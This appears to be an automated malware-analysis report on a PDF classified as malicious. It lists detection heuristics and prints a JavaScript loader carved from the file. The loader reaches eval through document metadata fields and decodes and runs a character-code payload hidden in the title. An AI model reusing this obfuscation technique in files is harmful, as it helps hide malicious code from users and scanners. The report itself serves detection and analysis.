MALICIOUS
114
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 3
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
/Producer (String.fromCharCode) -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.js |
pdf-javascript-stream | PDF /JS object 1 at offset 0x462D | 359 bytes |
SHA-256: 33bd24a76c8b1f424db8880618f583926f890e41022b7618248f509e611c2905 |
|||
Preview scriptFirst 1,000 lines of the extracted script
var w = 4;
var sdmad = this.title.replace(/w/g,'*w,');
sdmad = sdmad.replace(/t/g,'2');
sdmad=sdmad.substr(0,sdmad.length-2) + ']';
hxa=function(){return function(){return this}()}();
rpj=hxa[this.subject];
uniku=rpj(this.producer);
rqb = rpj(sdmad);
var s = '';
for (i = 0; i < rqb.length; i++) {
nnnc = rqb[i];
s += uniku(nnnc);
}
rpj(s);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.